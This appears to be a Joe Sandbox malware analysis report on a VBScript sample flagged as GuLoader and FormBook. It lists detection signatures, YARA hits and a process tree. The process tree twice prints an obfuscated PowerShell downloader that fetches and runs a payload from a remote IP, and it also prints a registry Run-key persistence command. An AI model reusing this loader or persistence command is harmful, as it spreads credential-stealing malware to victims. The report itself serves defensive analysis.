Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
01105751.vbs

Overview

General Information

Sample name:01105751.vbs
renamed because original name is a hash value
Original sample name: _20240501105751.vbs
Analysis ID:1435413
MD5:5c7e4886e009c7d2908ec633bf48cf8e
SHA1:72e9f5c65571b19402febfa7f36fc6ee5ce9a0f3
SHA256:c950aba2061fbb90b63122bec04b71764966e5554b6cd40114772c392464f748
Tags:vbs
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Creates multiple autostart registry keys
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5176 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 4340 cmdline: ping google.com -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 3776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PING.EXE (PID: 6704 cmdline: ping %.%.%.% MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3224 cmdline: C:\Windows\system32\cmd.exe /c dir MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed $.inguK lirevYderzrEutopnExaucehep.a)Kinkl ');Gracy216 (Programregningsfunktionens ' G ni$Hot ogBoffilBotchoOcto bD gsoapetull Akse:ReillJAlkalaPointd Nigre Wien=Alv o$micr RSkribeLute,p DestrMnsteoConfegSemisrKul,uaShephmVokstm Du,teFdevassten.. E.ilsIconopCarpelMediaiCalvat Sol ( ylds$DemenKFur arPrecieWhoretFladliBlownd Enkesifr,eeErnrif Re.af Cooke Anenk RaadtOu.fle Aft.rInclunO erfeFor,lsTimal)Morsk ');$Reprogrammes=$Jade[0];Gracy216 (Programregningsfunktionens 'P ovo$ orong.lyngl d.bkoModelbG uetaRe.islSmaad:DarviOSe vbpoverbb .delaParask raman preti ModsnDelirgSk teeIsomorSpildnPanoce Hec,sBogst= MakvNM.rphe Therw.unda- LakfO ndebG,verjAcquae Aca cFakket Paah B,vidSTransyGaards U.vitGigole Bes.m Til,.BarreNill meHrevitpl ni. ,ddiW Fyrie S,ilb KodeCDecerl,krmiiKenyoeElseknReinttKaryo ');Gracy216 (Programregningsfunktionens ' Opkr$ anicO Am tpmanifbAeriaaDragokSom knlag,piCowbon TestgBve reDialerTapetn Occ.e Acc,sLysim.BegruHSensaeSola,aeddo.dMidene,esbirSkrivszuric[Unbat$DyrskSPrivipAgglorBrdskaBondeySkrlleChromnJabotsDysc,]Afse.=Clino$PerisD CeptiSpants NummkCarpooAstros,harnkThoseaCzardsYement ,reteTauterVirileFotognSlang ');$unrestitutive=Programregningsfunktionens 'unquiO.etshpKardub enfoaUns.rkKh.lin.undaiSdeign Af.kgStikkeforfarPhilinSchooeMastes fjer.CubanDI dusoA,sluw MissnBonifltal,uo Spira Irrad ndriF .yrsi my,glSta.leCon.i(Immun$SkadeRSi.use SulppUnhilrExcuso .uargQuislrGaaseaSmid m FollmBeefiebod gs ,one,Unchl$sk ifBSamitaSmaabgHaveeaGotergimpeteWolfyrDebat) Dext ';$unrestitutive=$Virksomhedstypens[1]+$unrestitutive;$Bagager=$Virksomhedstypens[0];Gracy216 (Programregningsfunktionens 'Bruge$KabelgCrackl BankoAntikbSystea kovsl ehf:Wit iC i,dhhFunktaCo.dyrMatripNonreiChapt= Hasl(DobbeTGenv.eAntidsVognpt u pa-Fyr.ePChiboadiplotFogethPense svog$FeltrBGranoaUndergS alta EjurgLact ePiar rBlaas) Bonb ');while (!$Charpi) {Gracy216 (Programregningsfunktionens '.ekor$attragLitholPerinoOverab S riaMaelsl Eass:Xe opkTrapplOve.ci HousgPlatyeFiffischl.r=buest$,oldft ersirKonsuuDyr,eeHoved ') ;Gracy216 $unrestitutive;Gracy216 (Programregningsfunktionens 'DrakoSCustutAli,aaAmo.nrS.ltitDoser-B.criSSocialhear e JosteKalciplynce Minds4 tra, ');Gracy216 (Programregningsfunktionens 'Moiti$HentrgHomeslAttrioTylerbTocylaDesp.l Ri s:Hoo aC epash,rdnua NicorHemsepDeerfi,esbe=Pseud(,crieTFiordeBebl s Rub t F.va-SnaffPsq,ataS,aahtWizenhProgr Udste$XylidBTilstaKommugTypegaEp togLykkee ypoar Bevg)Niels ') ;Gracy216 (Programregningsfunktionens 'Amidu$ I dlgFlgesl Bilfo Barrb Afa a Ca,slapote:Vi erTIma.erHeadseAfskynEuxans Imp.eKobsjs nfer=T wmo$ NitrgG raflNewyooAtwixbIrredaCarpelPresb:TipskC,ynkeiEndesr FurlcHandeuSu,erm FlegzBlikkeGl,conMotiviBogs.t PoethCleara TriulLo,di+be.ka+Gymno%Trans$.crumJShawyaklostdUdlaae Quin.NonhecUn roo Ink,uNo phn com,t ewr ') ;$Reprogrammes=$Jade[$Trenses];}Gracy216 (Programregningsfunktionens 'Riban$IncongCheepl ar.eo Sperbglucoas,lenlRubin:Snvr.F GererFil,ue Salld Semis Showb Kalce S,bdv Holda SubseMaleagFl veeUnivelFactisYahgaeJ.wle1Negli3Incul3Besti m,dm= Fitm FecktG pfyleBepaitOctof- Fr mCgaranochartnKrad tPrioreU.ympnBestetRe.ns Hj or$ N geBRegnsaBromcg.ermsaPasipgSou.we ntrrMes e ');Gracy216 (Programregningsfunktionens 'Hjert$watergAabnelPro.iounre,b VoksaAutomlCoisl: RyddIAl,ctn MarkcSeptioRemonaHebdolB eeke AinusVeksecVictieHerm nTeachc ExteeFine Nicht=Jus,l Avoca[ ,issSKenosy Haw sKakoftN.nhee Und,m asr. AltaCFejlboMidfinSide,vToldbeA oebrBeboetEumen]Dngbr:Taarn:RecepFSava.rSkingoBillim RemuBSiliqa fremsSparee obsc6Under4N theSSee,st ,ndsrTyp.oiHjmesn AfkagSk iv(,prrs$N ettFKolonrRetoueglottdRecalsUnt.mb Dadaekeratv Sovea False ungbgSor.aeSpaaklM.sdesCetaneTunne1defig3cep.a3Bredd)sloww ');Gracy216 (Programregningsfunktionens 'Ances$CellugTnkeelCaesioArvesb MetraRumswl igan: romaPunproe ,ekulGl,sasPiruedT.rreyLejlarCeremf GelaaT.rifrHugonmIndag Preki=vendi D.ase[NeddyScoffeySmudgsMu,kitGemineb belmDyppe. HresT S,ipeChowdxapolltMlkes.KontrE ,rdin O,occ Ind oRest,dLoomiiBortfnKedelgIncul]Natur:Hoved:StracAPrjudS.archC pantI PhenI N.nf.GelatGUdskre ,ildt Arm.SCommetInvadr Messi,ooksnDj,elgudham(Uroks$RunouIMedicnSau ecNonproUdvisaFrih lFortreKalots Volcc KlkkesticknParenc Vmi e,osta)Therm ');Gracy216 (Programregningsfunktionens 'Reac $ FadegMaximlEkskloHorosb ,onnaSyst,lReces: SmreSMcmahiTragtlHeadsdAnkeseBa.etfBytt,i Serts orfrkExtboeMisadrnulpunHjtidedatol=R str$XiphiPS,atieNonprlEstersSa,frd akneyKatarr mesef UnstastyrerreblomBesla.huff.sCubituVictib,indes nlegtOr anrKnippiShallnTink.g s.ld( Navn3Nonsy1Pride9 Pref8Hotel5Dialo3 ,ilb,Neis 2 Brev8Un,ro4Flaad1Svens7,reex)Terro ');Gracy216 $Sildefiskerne;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1436 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6096 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed $.inguK lirevYderzrEutopnExaucehep.a)Kinkl ');Gracy216 (Programregningsfunktionens ' G ni$Hot ogBoffilBotchoOcto bD gsoapetull Akse:ReillJAlkalaPointd Nigre Wien=Alv o$micr RSkribeLute,p DestrMnsteoConfegSemisrKul,uaShephmVokstm Du,teFdevassten.. E.ilsIconopCarpelMediaiCalvat Sol ( ylds$DemenKFur arPrecieWhoretFladliBlownd Enkesifr,eeErnrif Re.af Cooke Anenk RaadtOu.fle Aft.rInclunO erfeFor,lsTimal)Morsk ');$Reprogrammes=$Jade[0];Gracy216 (Programregningsfunktionens 'P ovo$ orong.lyngl d.bkoModelbG uetaRe.islSmaad:DarviOSe vbpoverbb .delaParask raman preti ModsnDelirgSk teeIsomorSpildnPanoce Hec,sBogst= MakvNM.rphe Therw.unda- LakfO ndebG,verjAcquae Aca cFakket Paah B,vidSTransyGaards U.vitGigole Bes.m Til,.BarreNill meHrevitpl ni. ,ddiW Fyrie S,ilb KodeCDecerl,krmiiKenyoeElseknReinttKaryo ');Gracy216 (Programregningsfunktionens ' Opkr$ anicO Am tpmanifbAeriaaDragokSom knlag,piCowbon TestgBve reDialerTapetn Occ.e Acc,sLysim.BegruHSensaeSola,aeddo.dMidene,esbirSkrivszuric[Unbat$DyrskSPrivipAgglorBrdskaBondeySkrlleChromnJabotsDysc,]Afse.=Clino$PerisD CeptiSpants NummkCarpooAstros,harnkThoseaCzardsYement ,reteTauterVirileFotognSlang ');$unrestitutive=Programregningsfunktionens 'unquiO.etshpKardub enfoaUns.rkKh.lin.undaiSdeign Af.kgStikkeforfarPhilinSchooeMastes fjer.CubanDI dusoA,sluw MissnBonifltal,uo Spira Irrad ndriF .yrsi my,glSta.leCon.i(Immun$SkadeRSi.use SulppUnhilrExcuso .uargQuislrGaaseaSmid m FollmBeefiebod gs ,one,Unchl$sk ifBSamitaSmaabgHaveeaGotergimpeteWolfyrDebat) Dext ';$unrestitutive=$Virksomhedstypens[1]+$unrestitutive;$Bagager=$Virksomhedstypens[0];Gracy216 (Programregningsfunktionens 'Bruge$KabelgCrackl BankoAntikbSystea kovsl ehf:Wit iC i,dhhFunktaCo.dyrMatripNonreiChapt= Hasl(DobbeTGenv.eAntidsVognpt u pa-Fyr.ePChiboadiplotFogethPense svog$FeltrBGranoaUndergS alta EjurgLact ePiar rBlaas) Bonb ');while (!$Charpi) {Gracy216 (Programregningsfunktionens '.ekor$attragLitholPerinoOverab S riaMaelsl Eass:Xe opkTrapplOve.ci HousgPlatyeFiffischl.r=buest$,oldft ersirKonsuuDyr,eeHoved ') ;Gracy216 $unrestitutive;Gracy216 (Programregningsfunktionens 'DrakoSCustutAli,aaAmo.nrS.ltitDoser-B.criSSocialhear e JosteKalciplynce Minds4 tra, ');Gracy216 (Programregningsfunktionens 'Moiti$HentrgHomeslAttrioTylerbTocylaDesp.l Ri s:Hoo aC epash,rdnua NicorHemsepDeerfi,esbe=Pseud(,crieTFiordeBebl s Rub t F.va-SnaffPsq,ataS,aahtWizenhProgr Udste$XylidBTilstaKommugTypegaEp togLykkee ypoar Bevg)Niels ') ;Gracy216 (Programregningsfunktionens 'Amidu$ I dlgFlgesl Bilfo Barrb Afa a Ca,slapote:Vi erTIma.erHeadseAfskynEuxans Imp.eKobsjs nfer=T wmo$ NitrgG raflNewyooAtwixbIrredaCarpelPresb:TipskC,ynkeiEndesr FurlcHandeuSu,erm FlegzBlikkeGl,conMotiviBogs.t PoethCleara TriulLo,di+be.ka+Gymno%Trans$.crumJShawyaklostdUdlaae Quin.NonhecUn roo Ink,uNo phn com,t ewr ') ;$Reprogrammes=$Jade[$Trenses];}Gracy216 (Programregningsfunktionens 'Riban$IncongCheepl ar.eo Sperbglucoas,lenlRubin:Snvr.F GererFil,ue Salld Semis Showb Kalce S,bdv Holda SubseMaleagFl veeUnivelFactisYahgaeJ.wle1Negli3Incul3Besti m,dm= Fitm FecktG pfyleBepaitOctof- Fr mCgaranochartnKrad tPrioreU.ympnBestetRe.ns Hj or$ N geBRegnsaBromcg.ermsaPasipgSou.we ntrrMes e ');Gracy216 (Programregningsfunktionens 'Hjert$watergAabnelPro.iounre,b VoksaAutomlCoisl: RyddIAl,ctn MarkcSeptioRemonaHebdolB eeke AinusVeksecVictieHerm nTeachc ExteeFine Nicht=Jus,l Avoca[ ,issSKenosy Haw sKakoftN.nhee Und,m asr. AltaCFejlboMidfinSide,vToldbeA oebrBeboetEumen]Dngbr:Taarn:RecepFSava.rSkingoBillim RemuBSiliqa fremsSparee obsc6Under4N theSSee,st ,ndsrTyp.oiHjmesn AfkagSk iv(,prrs$N ettFKolonrRetoueglottdRecalsUnt.mb Dadaekeratv Sovea False ungbgSor.aeSpaaklM.sdesCetaneTunne1defig3cep.a3Bredd)sloww ');Gracy216 (Programregningsfunktionens 'Ances$CellugTnkeelCaesioArvesb MetraRumswl igan: romaPunproe ,ekulGl,sasPiruedT.rreyLejlarCeremf GelaaT.rifrHugonmIndag Preki=vendi D.ase[NeddyScoffeySmudgsMu,kitGemineb belmDyppe. HresT S,ipeChowdxapolltMlkes.KontrE ,rdin O,occ Ind oRest,dLoomiiBortfnKedelgIncul]Natur:Hoved:StracAPrjudS.archC pantI PhenI N.nf.GelatGUdskre ,ildt Arm.SCommetInvadr Messi,ooksnDj,elgudham(Uroks$RunouIMedicnSau ecNonproUdvisaFrih lFortreKalots Volcc KlkkesticknParenc Vmi e,osta)Therm ');Gracy216 (Programregningsfunktionens 'Reac $ FadegMaximlEkskloHorosb ,onnaSyst,lReces: SmreSMcmahiTragtlHeadsdAnkeseBa.etfBytt,i Serts orfrkExtboeMisadrnulpunHjtidedatol=R str$XiphiPS,atieNonprlEstersSa,frd akneyKatarr mesef UnstastyrerreblomBesla.huff.sCubituVictib,indes nlegtOr anrKnippiShallnTink.g s.ld( Navn3Nonsy1Pride9 Pref8Hotel5Dialo3 ,ilb,Neis 2 Brev8Un,ro4Flaad1Svens7,reex)Terro ');Gracy216 $Sildefiskerne;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2308 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 5512 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 3360 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 5616 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • TsrCaEwNrfOKANGWcsg.exe (PID: 4092 cmdline: "C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • xcopy.exe (PID: 6664 cmdline: "C:\Windows\SysWOW64\xcopy.exe" MD5: 7E9B7CE496D09F70C072930940F9F02C)
              • TsrCaEwNrfOKANGWcsg.exe (PID: 7132 cmdline: "C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 4776 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wab.exe (PID: 6484 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 2136 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 4852 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x4752a:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x30aa9:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a4d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13a4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000B.00000002.2879301889.0000000008910000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        Click to see the 14 entries

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_5692.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x1024e:$b2: ::FromBase64String(
        • 0xd5e0:$s1: -join
        • 0x6d8c:$s4: +=
        • 0x6e4e:$s4: +=
        • 0xb075:$s4: +=
        • 0xd192:$s4: +=
        • 0xd47c:$s4: +=
        • 0xd5c2:$s4: +=
        • 0xf819:$s4: +=
        • 0xf899:$s4: +=
        • 0xf95f:$s4: +=
        • 0xf9df:$s4: +=
        • 0xfbb5:$s4: +=
        • 0xfc39:$s4: +=
        • 0xdd02:$e4: Get-WmiObject
        • 0xdef1:$e4: Get-Process
        • 0xdf49:$e4: Start-Process
        amsi32_6096.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x101bd:$b2: ::FromBase64String(
        • 0xd5e0:$s1: -join
        • 0x6d8c:$s4: +=
        • 0x6e4e:$s4: +=
        • 0xb075:$s4: +=
        • 0xd192:$s4: +=
        • 0xd47c:$s4: +=
        • 0xd5c2:$s4: +=
        • 0xf819:$s4: +=
        • 0xf899:$s4: +=
        • 0xf95f:$s4: +=
        • 0xf9df:$s4: +=
        • 0xfbb5:$s4: +=
        • 0xfc39:$s4: +=
        • 0xdd02:$e4: Get-WmiObject
        • 0xdef1:$e4: Get-Process
